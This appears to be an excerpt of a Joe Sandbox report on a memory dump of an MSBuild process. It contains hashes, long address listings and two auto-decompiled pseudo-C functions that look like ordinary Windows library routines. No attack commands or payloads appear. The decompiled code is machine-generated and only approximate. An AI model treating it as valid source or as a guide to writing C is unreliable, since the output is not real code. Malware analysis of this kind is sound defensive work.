                                                                                                0x00000000
                                                                                                0x010d231c
                                                                                                0x010d225c
                                                                                                0x010d225c
                                                                                                0x00000000
                                                                                                0x010d225c
                                                                                                0x010d212a
                                                                                                0x010d2134
                                                                                                0x010d2138
                                                                                                0x010d213d
                                                                                                0x01115858
                                                                                                0x01115863
                                                                                                0x01115863
                                                                                                0x01115867
                                                                                                0x0111586a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0111586c
                                                                                                0x0111586c
                                                                                                0x01115871
                                                                                                0x01115875
                                                                                                0x01115877
                                                                                                0x01115997
                                                                                                0x0111599c
                                                                                                0x011159a1
                                                                                                0x011159a7
                                                                                                0x011159a7
                                                                                                0x00000000
                                                                                                0x011159a7
                                                                                                0x0111587d
                                                                                                0x00000000
                                                                                                0x0111588b
                                                                                                0x0111588b
                                                                                                0x01115890
                                                                                                0x01115892
                                                                                                0x01115894
                                                                                                0x01115899
                                                                                                0x0111589b
                                                                                                0x011158a0
                                                                                                0x011158a0
                                                                                                0x011158aa
                                                                                                0x011158b2
                                                                                                0x011158b6
                                                                                                0x011158be
                                                                                                0x011158c6
                                                                                                0x011158c9
                                                                                                0x0111590d
                                                                                                0x01115917
                                                                                                0x0111591a
                                                                                                0x0111591c
                                                                                                0x01115920
                                                                                                0x01115928
                                                                                                0x0111592a
                                                                                                0x0111592c
                                                                                                0x0111592e
                                                                                                0x0111592e
                                                                                                0x011158cb
                                                                                                0x011158cd
                                                                                                0x011158d8
                                                                                                0x011158e0
                                                                                                0x011158f4
                                                                                                0x011158fe
                                                                                                0x011158fe
                                                                                                0x0111593a
                                                                                                0x0111593e
                                                                                                0x01115940
                                                                                                0x01115942
                                                                                                0x00000000
                                                                                                0x01115944
                                                                                                0x01115944
                                                                                                0x01115949
                                                                                                0x0111594e
                                                                                                0x0111594e
                                                                                                0x01115953
                                                                                                0x0111595b
                                                                                                0x01115976
                                                                                                0x01115976
                                                                                                0x0111597a
                                                                                                0x0111597f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01115981
                                                                                                0x01115981
                                                                                                0x01115981
                                                                                                0x01115983
                                                                                                0x01115988
                                                                                                0x0111598d
                                                                                                0x01115991
                                                                                                0x01115991
                                                                                                0x00000000
                                                                                                0x0111595d
                                                                                                0x0111595d
                                                                                                0x01115963
                                                                                                0x01115965
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01115967
                                                                                                0x01115967
                                                                                                0x0111596b
                                                                                                0x0111596d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0111596f
                                                                                                0x01115971
                                                                                                0x01115971
                                                                                                0x01115974
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01115974
                                                                                                0x00000000
                                                                                                0x01115967
                                                                                                0x0111595b
                                                                                                0x01115942
                                                                                                0x01115863
                                                                                                0x010d2143
                                                                                                0x010d2143
                                                                                                0x010d2149
                                                                                                0x010d214f
                                                                                                0x010d22f1
                                                                                                0x010d22f6
                                                                                                0x00000000
                                                                                                0x010d2173
                                                                                                0x010d2173
                                                                                                0x010d217d
                                                                                                0x010d2181
                                                                                                0x010d2186
                                                                                                0x011159ae
                                                                                                0x011159b2
                                                                                                0x011159b5
                                                                                                0x011159b7
                                                                                                0x011159ba
                                                                                                0x011159cd
                                                                                                0x011159d1
                                                                                                0x011159d5
                                                                                                0x011159d9
                                                                                                0x011159db
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011159dd
                                                                                                0x011159dd
                                                                                                0x011159e1
                                                                                                0x011159e4
                                                                                                0x011159e7
                                                                                                0x011159ee
                                                                                                0x011159ee
                                                                                                0x011159f3
                                                                                                0x011159f3
                                                                                                0x00000000
                                                                                                0x010d2186
                                                                                                0x010d214f
                                                                                                0x010d2106
                                                                                                0x010d2266
                                                                                                0x010d20d8
                                                                                                0x010d20da
                                                                                                0x010d20e0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8ddd2ae95cbce76db271406ce8134c43a92ff6a76a4259f604b206fb8afe7c32
                                                                                                • Instruction ID: 01fafb91e34117399d8137ba680f28ada09164aa3613deb15886fe5c4cafdc56
                                                                                                • Opcode Fuzzy Hash: 8ddd2ae95cbce76db271406ce8134c43a92ff6a76a4259f604b206fb8afe7c32
                                                                                                • Instruction Fuzzy Hash: 83F1E2356083419FDB6ACF2CC84076ABBE2AFD6324F04856DF9D59B285D734D841CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010B849B Relevance: .3, Instructions: 290COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 92%
                                                                                                			E010B849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x117f9c0);
				E010FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1197b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E010BCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E010C2280( *[fs:0x30], 0x1198550);
						_t139 =  *0x1197b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E010DF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E010BFFB0(_t193, _t235, 0x1198550);
								L5:
								return E010FD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E010A1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1197b9c; // 0x0
							_t235 = L010C4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1197b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E010DA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E010BFFB0(_t193, _t235, 0x1198550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L010C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L010C77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1197b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1197b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E010E37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1197b9c; // 0x0
									_t214 = L010C4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E010E37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1197b10 =  *0x1197b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1197b04 =  *0x1197b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L010C77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L010C77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1197b08 =  *0x1197b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E010E57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E010EF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L010C77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E010DA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L010C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E010E96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                                                0x010b849b
                                                                                                0x010b849b
                                                                                                0x010b849b
                                                                                                0x010b849b
                                                                                                0x010b849d
                                                                                                0x010b84a2
                                                                                                0x010b84a7
                                                                                                0x010b84b1
                                                                                                0x010b84d8
                                                                                                0x00000000
                                                                                                0x010b84b3
                                                                                                0x010b84c4
                                                                                                0x010b84c9
                                                                                                0x010b84cd
                                                                                                0x010b84cf
                                                                                                0x010b84cf
                                                                                                0x010b84d6
                                                                                                0x010b84e6
                                                                                                0x010b84e9
                                                                                                0x010b84ec
                                                                                                0x010b84ef
                                                                                                0x010b84f2
                                                                                                0x010b84f4
                                                                                                0x010b84fc
                                                                                                0x010b8501
                                                                                                0x010b8506
                                                                                                0x010b8509
                                                                                                0x010b86e0
                                                                                                0x010b86e5
                                                                                                0x010b86e8
                                                                                                0x010b86ed
                                                                                                0x010b86f0
                                                                                                0x010b86f2
                                                                                                0x01109afd
                                                                                                0x01109b02
                                                                                                0x010b84da
                                                                                                0x010b84df
                                                                                                0x010b84df
                                                                                                0x010b86fa
                                                                                                0x010b86fd
                                                                                                0x010b86fe
                                                                                                0x010b8701
                                                                                                0x010b8706
                                                                                                0x010b8709
                                                                                                0x010b870b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010b8711
                                                                                                0x010b8725
                                                                                                0x010b8727
                                                                                                0x010b872a
                                                                                                0x010b872c
                                                                                                0x01109af0
                                                                                                0x01109af5
                                                                                                0x010b8732
                                                                                                0x010b8732
                                                                                                0x010b8732
                                                                                                0x010b8735
                                                                                                0x010b8737
                                                                                                0x010b8515
                                                                                                0x010b8515
                                                                                                0x010b8518
                                                                                                0x010b851d
                                                                                                0x010b8523
                                                                                                0x010b8527
                                                                                                0x010b852b
                                                                                                0x010b8537
                                                                                                0x010b8539
                                                                                                0x010b853c
                                                                                                0x010b853e
                                                                                                0x010b868c
                                                                                                0x010b8691
                                                                                                0x010b8699
                                                                                                0x010b869b
                                                                                                0x010b8744
                                                                                                0x010b8748
                                                                                                0x010b86a1
                                                                                                0x010b86a1
                                                                                                0x010b86a1
                                                                                                0x010b86a4
                                                                                                0x010b86a8
                                                                                                0x01109bdf
                                                                                                0x01109bdf
                                                                                                0x010b86ae
                                                                                                0x010b86b0
                                                                                                0x00000000
                                                                                                0x010b86b6
                                                                                                0x00000000
                                                                                                0x01109be9
                                                                                                0x010b86b0
                                                                                                0x010b8544
                                                                                                0x010b854a
                                                                                                0x010b854d
                                                                                                0x010b8551
                                                                                                0x010b876e
                                                                                                0x010b8778
                                                                                                0x010b877b
                                                                                                0x010b8780
                                                                                                0x010b8557
                                                                                                0x010b8557
                                                                                                0x010b855d
                                                                                                0x010b855d
                                                                                                0x010b856b
                                                                                                0x010b856e
                                                                                                0x010b8570
                                                                                                0x010b8573
                                                                                                0x010b8576
                                                                                                0x010b8576
                                                                                                0x010b8579
                                                                                                0x010b857b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010b8581
                                                                                                0x010b85a0
                                                                                                0x010b85a2
                                                                                                0x010b85a5
                                                                                                0x010b85a7
                                                                                                0x01109b1b
                                                                                                0x01109b1b
                                                                                                0x010b862e
                                                                                                0x010b862e
                                                                                                0x010b8631
                                                                                                0x010b8631
                                                                                                0x010b8634
                                                                                                0x010b8636
                                                                                                0x010b8669
                                                                                                0x010b8669
                                                                                                0x010b866b
                                                                                                0x01109bbf
                                                                                                0x01109bc4
                                                                                                0x01109bc8
                                                                                                0x01109bce
                                                                                                0x01109bce
                                                                                                0x010b8671
                                                                                                0x010b8671
                                                                                                0x010b8674
                                                                                                0x010b8676
                                                                                                0x01109bae
                                                                                                0x01109bae
                                                                                                0x010b8676
                                                                                                0x010b867c
                                                                                                0x010b867e
                                                                                                0x010b8688
                                                                                                0x010b8688
                                                                                                0x00000000
                                                                                                0x010b867e
                                                                                                0x010b8638
                                                                                                0x010b8638
                                                                                                0x010b863b
                                                                                                0x010b863e
                                                                                                0x010b863f
                                                                                                0x010b8642
                                                                                                0x010b8645
                                                                                                0x010b8648
                                                                                                0x010b864d
                                                                                                0x01109b69
                                                                                                0x01109b6e
                                                                                                0x01109b7b
                                                                                                0x01109b81
                                                                                                0x01109b85
                                                                                                0x01109b89
                                                                                                0x01109ba7
                                                                                                0x01109b8b
                                                                                                0x01109b91
                                                                                                0x01109b9a
                                                                                                0x01109b9f
                                                                                                0x01109b9f
                                                                                                0x010b8788
                                                                                                0x010b878d
                                                                                                0x010b8763
                                                                                                0x010b8763
                                                                                                0x010b8766
                                                                                                0x00000000
                                                                                                0x010b8766
                                                                                                0x01109b70
                                                                                                0x00000000
                                                                                                0x01109b70
                                                                                                0x010b8656
                                                                                                0x010b865a
                                                                                                0x010b865c
                                                                                                0x010b8752
                                                                                                0x010b8756
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010b875e
                                                                                                0x00000000
                                                                                                0x010b875e
                                                                                                0x010b8662
                                                                                                0x010b8662
                                                                                                0x010b8662
                                                                                                0x010b8666
                                                                                                0x00000000
                                                                                                0x010b8666
                                                                                                0x010b85b7
                                                                                                0x010b85b9
                                                                                                0x010b85bc
                                                                                                0x010b85bf
                                                                                                0x010b85cc
                                                                                                0x010b85d1
                                                                                                0x010b85d4
                                                                                                0x010b85db
                                                                                                0x010b85de
                                                                                                0x010b85e0
                                                                                                0x01109b5f
                                                                                                0x00000000
                                                                                                0x01109b5f
                                                                                                0x010b85e6
                                                                                                0x010b85ea
                                                                                                0x010b86c3
                                                                                                0x010b86c5
                                                                                                0x010b86c8
                                                                                                0x010b86ca
                                                                                                0x01109b16
                                                                                                0x00000000
                                                                                                0x01109b16
                                                                                                0x010b86d6
                                                                                                0x010b85f6
                                                                                                0x010b85f6
                                                                                                0x010b85f9
                                                                                                0x010b8602
                                                                                                0x010b8606
                                                                                                0x010b860a
                                                                                                0x010b860b
                                                                                                0x010b860e
                                                                                                0x010b8611
                                                                                                0x00000000
                                                                                                0x010b8611
                                                                                                0x010b85f3
                                                                                                0x00000000
                                                                                                0x010b85f3
                                                                                                0x010b8619
                                                                                                0x010b861e
                                                                                                0x010b861e
                                                                                                0x010b8621
                                                                                                0x010b8622
                                                                                                0x010b8623
                                                                                                0x010b8625
                                                                                                0x010b862c
                                                                                                0x00000000
                                                                                                0x010b873d
                                                                                                0x00000000
                                                                                                0x010b873d
                                                                                                0x010b8737
                                                                                                0x010b850f
                                                                                                0x010b8512
                                                                                                0x00000000
                                                                                                0x010b8512
                                                                                                0x00000000
                                                                                                0x010b84d6

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 54f3af4c377299ccdd6abc2ebc716940a7c38175a201c2f1e9ee29d3f35f22b8
                                                                                                • Instruction ID: 74568eb87fc95aa2db23cf4d5090f1e0ed33a6a2fd4d874a5bde4e5ade0bdff2
                                                                                                • Opcode Fuzzy Hash: 54f3af4c377299ccdd6abc2ebc716940a7c38175a201c2f1e9ee29d3f35f22b8
                                                                                                • Instruction Fuzzy Hash: 55B16C70E0020ADFDB29DFD9C994AEDBBB9BF48304F10812AE555AB295D770A841CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010AC600 Relevance: .2, Instructions: 225COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 67%
                                                                                                			E010AC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x119d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E010B6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E010EB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1197b9c; // 0x0
					_t74 = L010C4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E010E9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L010C77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E010EF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E010E13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L010C77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E010E9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                                                0x010ac608
                                                                                                0x010ac615
                                                                                                0x010ac625
                                                                                                0x010ac62d
                                                                                                0x010ac635
                                                                                                0x010ac640
                                                                                                0x010ac680
                                                                                                0x010ac687
                                                                                                0x010ac688
                                                                                                0x010ac689
                                                                                                0x010ac694
                                                                                                0x010ac694
                                                                                                0x010ac642
                                                                                                0x010ac64a
                                                                                                0x010ac697
                                                                                                0x01117a25
                                                                                                0x01117a2b
                                                                                                0x01117a2e
                                                                                                0x01117a30
                                                                                                0x01117bea
                                                                                                0x01117bea
                                                                                                0x00000000
                                                                                                0x01117bea
                                                                                                0x01117a36
                                                                                                0x01117a43
                                                                                                0x01117a48
                                                                                                0x01117a4c
                                                                                                0x01117a4e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117a58
                                                                                                0x01117a5a
